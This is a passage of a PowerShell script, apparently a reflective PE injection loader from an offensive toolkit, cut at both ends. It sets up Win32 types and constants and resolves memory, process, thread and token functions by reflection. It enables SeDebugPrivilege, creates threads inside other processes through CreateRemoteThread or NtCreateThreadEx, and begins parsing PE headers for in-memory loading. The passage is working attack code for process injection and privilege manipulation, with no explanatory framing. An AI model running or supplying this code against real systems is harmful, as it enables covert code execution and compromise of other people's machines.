  318. $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES
  319. return $Win32Types
  320. }
  321. Function Get-Win32Constants
  322. {
  323. $Win32Constants = New-Object System.Object
  324. $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
  325. $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
  326. $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01
  327. $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02
  328. $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04
  329. $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08
  330. $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10
  331. $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20
  332. $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40
  333. $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80
  334. $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200
  335. $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0
  336. $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3
  337. $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10
  338. $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000
  339. $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000
  340. $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000
  341. $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000
  342. $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000
  343. $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000
  344. $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
  345. $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000
  346. $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40
  347. $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100
  348. $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000
  349. $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008
  350. $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020
  351. $Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2
  352. $Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0
  353. return $Win32Constants
  354. }
  355. Function Get-Win32Functions
  356. {
  357. $Win32Functions = New-Object System.Object
  358. $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
  359. $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
  360. $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)
  361. $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc
  362. $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx
  363. $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
  364. $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)
  365. $Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx
  366. $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy
  367. $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])
  368. $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)
  369. $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy
  370. $memsetAddr = Get-ProcAddress msvcrt.dll memset
  371. $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])
  372. $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)
  373. $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset
  374. $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA
  375. $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])
  376. $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)
  377. $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary
  378. $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress
  379. $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])
  380. $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)
  381. $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress
  382. $GetProcAddressOrdinalAddr = Get-ProcAddress kernel32.dll GetProcAddress
  383. $GetProcAddressOrdinalDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr])
  384. $GetProcAddressOrdinal = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressOrdinalAddr, $GetProcAddressOrdinalDelegate)
  385. $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressOrdinal -Value $GetProcAddressOrdinal
  386. $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
  387. $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool])
  388. $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)
  389. $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree
  390. $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx
  391. $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])
  392. $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)
  393. $Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx
  394. $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect
  395. $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])
  396. $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate)
  397. $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect
  398. $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA
  399. $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])
  400. $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)
  401. $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle
  402. $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary
  403. $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])
  404. $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)
  405. $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary
  406. $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
  407.     $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
  408.     $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)
  409. $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess
  410. $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
  411.     $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32])
  412.     $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
  413. $Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject
  414. $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
  415.         $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
  416.         $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)
  417. $Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory
  418. $ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory
  419.         $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
  420.         $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate)
  421. $Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory
  422. $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread
  423.         $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
  424.         $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)
  425. $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread
  426. $GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread
  427.         $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])
  428.         $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate)
  429. $Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread
  430. $OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken
  431.         $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])
  432.         $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)
  433. $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken
  434. $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread
  435.         $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])
  436.         $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)
  437. $Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread
  438. $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
  439.         $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])
  440.         $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)
  441. $Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges
  442. $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA
  443.         $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool])
  444.         $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)
  445. $Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue
  446. $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf
  447.         $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])
  448.         $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)
  449. $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf
  450.         if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2))) {
  451.     $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx
  452.             $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])
  453.             $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)
  454.     $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx
  455.         }
  456. $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process
  457.         $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])
  458.         $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)
  459. $Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process
  460. $CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread
  461.         $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])
  462.         $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)
  463. $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread
  464. $LocalFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
  465. $LocalFreeDelegate = Get-DelegateType @([IntPtr])
  466. $LocalFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LocalFreeAddr, $LocalFreeDelegate)
  467. $Win32Functions | Add-Member NoteProperty -Name LocalFree -Value $LocalFree
  468. return $Win32Functions
  469. }
  470. Function Sub-SignedIntAsUnsigned
  471. {
  472. Param(
  473. [Parameter(Position = 0, Mandatory = $true)]
  474. [Int64]
  475. $Value1,
  476. [Parameter(Position = 1, Mandatory = $true)]
  477. [Int64]
  478. $Value2
  479. )
  480. [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
  481. [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
  482. [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
  483. if ($Value1Bytes.Count -eq $Value2Bytes.Count)
  484. {
  485. $CarryOver = 0
  486. for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
  487. {
  488. $Val = $Value1Bytes[$i] - $CarryOver
  489. if ($Val -lt $Value2Bytes[$i])
  490. {
  491. $Val += 256
  492. $CarryOver = 1
  493. }
  494. else
  495. {
  496. $CarryOver = 0
  497. }
  498. [UInt16]$Sum = $Val - $Value2Bytes[$i]
  499. $FinalBytes[$i] = $Sum -band 0x00FF
  500. }
  501. }
  502. else
  503. {
  504. Throw "Cannot subtract bytearrays of different sizes"
  505. }
  506. return [BitConverter]::ToInt64($FinalBytes, 0)
  507. }
  508. Function Add-SignedIntAsUnsigned
  509. {
  510. Param(
  511. [Parameter(Position = 0, Mandatory = $true)]
  512. [Int64]
  513. $Value1,
  514. [Parameter(Position = 1, Mandatory = $true)]
  515. [Int64]
  516. $Value2
  517. )
  518. [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
  519. [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
  520. [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
  521. if ($Value1Bytes.Count -eq $Value2Bytes.Count)
  522. {
  523. $CarryOver = 0
  524. for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
  525. {
  526. [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver
  527. $FinalBytes[$i] = $Sum -band 0x00FF
  528. if (($Sum -band 0xFF00) -eq 0x100)
  529. {
  530. $CarryOver = 1
  531. }
  532. else
  533. {
  534. $CarryOver = 0
  535. }
  536. }
  537. }
  538. else
  539. {
  540. Throw "Cannot add bytearrays of different sizes"
  541. }
  542. return [BitConverter]::ToInt64($FinalBytes, 0)
  543. }
  544. Function Compare-Val1GreaterThanVal2AsUInt
  545. {
  546. Param(
  547. [Parameter(Position = 0, Mandatory = $true)]
  548. [Int64]
  549. $Value1,
  550. [Parameter(Position = 1, Mandatory = $true)]
  551. [Int64]
  552. $Value2
  553. )
  554. [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
  555. [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
  556. if ($Value1Bytes.Count -eq $Value2Bytes.Count)
  557. {
  558. for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--)
  559. {
  560. if ($Value1Bytes[$i] -gt $Value2Bytes[$i])
  561. {
  562. return $true
  563. }
  564. elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i])
  565. {
  566. return $false
  567. }
  568. }
  569. }
  570. else
  571. {
  572. Throw "Cannot compare byte arrays of different size"
  573. }
  574. return $false
  575. }
  576. Function Convert-UIntToInt
  577. {
  578. Param(
  579. [Parameter(Position = 0, Mandatory = $true)]
  580. [UInt64]
  581. $Value
  582. )
  583. [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value)
  584. return ([BitConverter]::ToInt64($ValueBytes, 0))
  585. }
  586. Function Test-MemoryRangeValid
  587. {
  588. Param(
  589. [Parameter(Position = 0, Mandatory = $true)]
  590. [String]
  591. $DebugString,
  592. [Parameter(Position = 1, Mandatory = $true)]
  593. [System.Object]
  594. $PEInfo,
  595. [Parameter(Position = 2, Mandatory = $true)]
  596. [IntPtr]
  597. $StartAddress,
  598. [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
  599. [IntPtr]
  600. $Size
  601. )
  602.     [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
  603. $PEEndAddress = $PEInfo.EndAddress
  604. if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true)
  605. {
  606. Throw "Trying to write to memory smaller than allocated address range. $DebugString"
  607. }
  608. if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true)
  609. {
  610. Throw "Trying to write to memory greater than allocated address range. $DebugString"
  611. }
  612. }
  613. Function Write-BytesToMemory
  614. {
  615. Param(
  616. [Parameter(Position=0, Mandatory = $true)]
  617. [Byte[]]
  618. $Bytes,
  619. [Parameter(Position=1, Mandatory = $true)]
  620. [IntPtr]
  621. $MemoryAddress
  622. )
  623. for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++)
  624. {
  625. [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset])
  626. }
  627. }
  628. Function Get-DelegateType
  629. {
  630.     Param
  631.     (
  632.         [OutputType([Type])]
  633.         [Parameter( Position = 0)]
  634.         [Type[]]
  635.         $Parameters = (New-Object Type[](0)),
  636.         [Parameter( Position = 1 )]
  637.         [Type]
  638.         $ReturnType = [Void]
  639.     )
  640.     $Domain = [AppDomain]::CurrentDomain
  641.     $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
  642.     $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
  643.     $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
  644.     $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
  645.     $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
  646.     $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
  647.     $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
  648.     $MethodBuilder.SetImplementationFlags('Runtime, Managed')
  649.     Write-Output $TypeBuilder.CreateType()
  650. }
  651. Function Get-ProcAddress
  652. {
  653.     Param
  654.     (
  655.         [OutputType([IntPtr])]
  656.         [Parameter( Position = 0, Mandatory = $True )]
  657.         [String]
  658.         $Module,
  659.         [Parameter( Position = 1, Mandatory = $True )]
  660.         [String]
  661.         $Procedure
  662.     )
  663.     $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
  664.         Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
  665.     $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
  666.     $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
  667.     $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
  668.     $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
  669.     $tmpPtr = New-Object IntPtr
  670.     $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
  671.     Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
  672. }
  673. Function Enable-SeDebugPrivilege
  674. {
  675. Param(
  676. [Parameter(Position = 1, Mandatory = $true)]
  677. [System.Object]
  678. $Win32Functions,
  679. [Parameter(Position = 2, Mandatory = $true)]
  680. [System.Object]
  681. $Win32Types,
  682. [Parameter(Position = 3, Mandatory = $true)]
  683. [System.Object]
  684. $Win32Constants
  685. )
  686. [IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()
  687. if ($ThreadHandle -eq [IntPtr]::Zero)
  688. {
  689. Throw "Unable to get the handle to the current thread"
  690. }
  691. [IntPtr]$ThreadToken = [IntPtr]::Zero
  692. [Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
  693. if ($Result -eq $false)
  694. {
  695. $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
  696. if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)
  697. {
  698. $Result = $Win32Functions.ImpersonateSelf.Invoke(3)
  699. if ($Result -eq $false)
  700. {
  701. Throw "Unable to impersonate self"
  702. }
  703. $Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
  704. if ($Result -eq $false)
  705. {
  706. Throw "Unable to OpenThreadToken."
  707. }
  708. }
  709. else
  710. {
  711. Throw "Unable to OpenThreadToken. Error code: $ErrorCode"
  712. }
  713. }
  714. [IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))
  715. $Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid)
  716. if ($Result -eq $false)
  717. {
  718. Throw "Unable to call LookupPrivilegeValue"
  719. }
  720. [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)
  721. [IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)
  722. $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)
  723. $TokenPrivileges.PrivilegeCount = 1
  724. $TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)
  725. $TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED
  726. [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)
  727. $Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)
  728. $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value
  729. if (($Result -eq $false) -or ($ErrorCode -ne 0))
  730. {
  731. }
  732. [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)
  733. }
  734. Function Invoke-CreateRemoteThread
  735. {
  736. Param(
  737. [Parameter(Position = 1, Mandatory = $true)]
  738. [IntPtr]
  739. $ProcessHandle,
  740. [Parameter(Position = 2, Mandatory = $true)]
  741. [IntPtr]
  742. $StartAddress,
  743. [Parameter(Position = 3, Mandatory = $false)]
  744. [IntPtr]
  745. $ArgumentPtr = [IntPtr]::Zero,
  746. [Parameter(Position = 4, Mandatory = $true)]
  747. [System.Object]
  748. $Win32Functions
  749. )
  750. [IntPtr]$RemoteThreadHandle = [IntPtr]::Zero
  751. $OSVersion = [Environment]::OSVersion.Version
  752. if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))
  753. {
  754. $RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)
  755. $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
  756. if ($RemoteThreadHandle -eq [IntPtr]::Zero)
  757. {
  758. Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError"
  759. }
  760. }
  761. else
  762. {
  763. $RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)
  764. }
  765. if ($RemoteThreadHandle -eq [IntPtr]::Zero)
  766. {
  767. }
  768. return $RemoteThreadHandle
  769. }
  770. Function Get-ImageNtHeaders
  771. {
  772. Param(
  773. [Parameter(Position = 0, Mandatory = $true)]
  774. [IntPtr]
  775. $PEHandle,
  776. [Parameter(Position = 1, Mandatory = $true)]
  777. [System.Object]
  778. $Win32Types
  779. )
  780. $NtHeadersInfo = New-Object System.Object
  781. $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)
  782. [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))
  783. $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr
  784. $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)
  785.     if ($imageNtHeaders64.Signature -ne 0x00004550)
  786.     {
  787.         throw "Invalid IMAGE_NT_HEADER signature."
  788.     }
  789. if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')
  790. {
  791. $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64
  792. $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true
  793. }
  794. else
  795. {
  796. $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)
  797. $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32
